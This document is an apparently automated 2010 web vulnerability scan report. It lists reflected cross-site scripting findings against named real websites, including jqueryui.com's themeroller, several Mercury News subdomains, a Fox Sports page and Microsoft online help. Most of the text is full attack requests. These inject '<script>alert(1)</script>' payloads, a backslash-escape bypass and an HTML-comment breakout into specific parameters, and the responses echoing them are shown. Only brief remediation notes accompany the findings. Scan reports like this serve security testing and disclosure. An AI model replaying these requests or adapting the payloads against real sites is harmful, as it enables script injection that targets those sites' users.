GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b38ce9"><script>alert(1)</script>9fcb678b763&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67aae"><script>alert(1)</script>d3e33429518 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff67aae"><script>alert(1)</script>d3e33429518&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164db"><script>alert(1)</script>6a00d66429c was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0164db"><script>alert(1)</script>6a00d66429c&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0164db"><script>alert(1)</script>6a00d66429c&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI ...[SNIP]...
3.189. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c71b"><script>alert(1)</script>cc48d1bc9db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?2c71b"><script>alert(1)</script>cc48d1bc9db=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:08:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f8ed"><script>alert(1)</script>e7a1c93907c was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6f8ed"><script>alert(1)</script>e7a1c93907c&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:11:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85bb8"><script>alert(1)</script>18668a6627e was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px85bb8"><script>alert(1)</script>18668a6627e&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:11:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1431d"><script>alert(1)</script>4705b847df6 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=301431d"><script>alert(1)</script>4705b847df6&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:10:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f99f"><script>alert(1)</script>6d451900ce7 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304f99f"><script>alert(1)</script>6d451900ce7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:11:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb954"><script>alert(1)</script>367a87104dd was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxcb954"><script>alert(1)</script>367a87104dd&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:11:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
3.195. http://mercurynews.stats.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mercurynews.stats.com
Path:
/fb/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e21"><script>alert(1)</script>284f253951f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb/scoreboard.asp?e4e21"><script>alert(1)</script>284f253951f=1 HTTP/1.1 Host: mercurynews.stats.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=10 Date: Mon, 15 Nov 2010 02:08:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 52877
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sports - NFL - Scoreboards - San Jose Mercury News</title>
<div id="omniture" style="display:none;"> <!-- S ...[SNIP]... <META content="60;/fb/scoreboard.asp?e4e21"><script>alert(1)</script>284f253951f=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
3.196. http://msn.foxsports.com/nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9704c'-alert(1)-'518f21c5656 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230?9704c'-alert(1)-'518f21c5656=1 HTTP/1.1 Host: msn.foxsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 234313 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=AE79DE3284C33592F90AA3B7DC247CB6; Path=/ X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=27 Date: Sun, 14 Nov 2010 23:14:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 454b3\'%3balert(1)//851c49b677b was submitted in the version parameter. This input was echoed as 454b3\\';alert(1)//851c49b677b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/Page.aspx?advid=200177&loc=53824&fsi=14784&version=Mercury454b3\'%3balert(1)//851c49b677b HTTP/1.1 Host: newspaperads.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; s_cc=true; ZZFLSH=29; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 02:09:23 GMT Server: Microsoft-IIS/6.0 X-Server-Name: HW3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... newspaperads.mercurynews.com';
3.198. http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinehelp.microsoft.com
Path:
/en-US/bing/ff808523.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b9a"><script>alert(1)</script>a63a2a31e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808523.aspx?f8b9a"><script>alert(1)</script>a63a2a31e98=1 HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAABtBwAA4XNQCXpBTPk7cZerNYh7mA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:14:04 GMT Content-Length: 40552
3.199. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinehelp.microsoft.com
Path:
/en-US/bing/ff808535.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6070d"><script>alert(1)</script>ad7ec223932 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808535.aspx?6070d"><script>alert(1)</script>ad7ec223932=1 HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAAFCgAAMPi17N5G3bmz8kqV4D9PUg!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:14:03 GMT Content-Length: 43681
The value of the rFreeForm request parameter is copied into an HTML comment. The payload c15c0--><script>alert(1)</script>f18d1ae576c was submitted in the rFreeForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /portlet/registration/html/info.jsp?rFreeForm=8101685c15c0--><script>alert(1)</script>f18d1ae576c HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><script><!-- window.focus(); //--></script><link type="text/css" rel="stylesheet" href='https://secure.extras.mnginteractive.com/live/css/MNGiDefaultStyles.css'><script> function o ...[SNIP]... <!-- BEGIN FREEFORM RENDER, ID 8101685c15c0--><script>alert(1)</script>f18d1ae576c --> ...[SNIP]...
The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb02</script><script>alert(1)</script>47f9d8515fe was submitted in the rPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration/?rPage=login6fb02</script><script>alert(1)</script>47f9d8515fe&url=http%3A%2F%2Fwww.mercurynews.com%2F&eRightsSessionExpired=true HTTP/1.1 Host: secure.www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
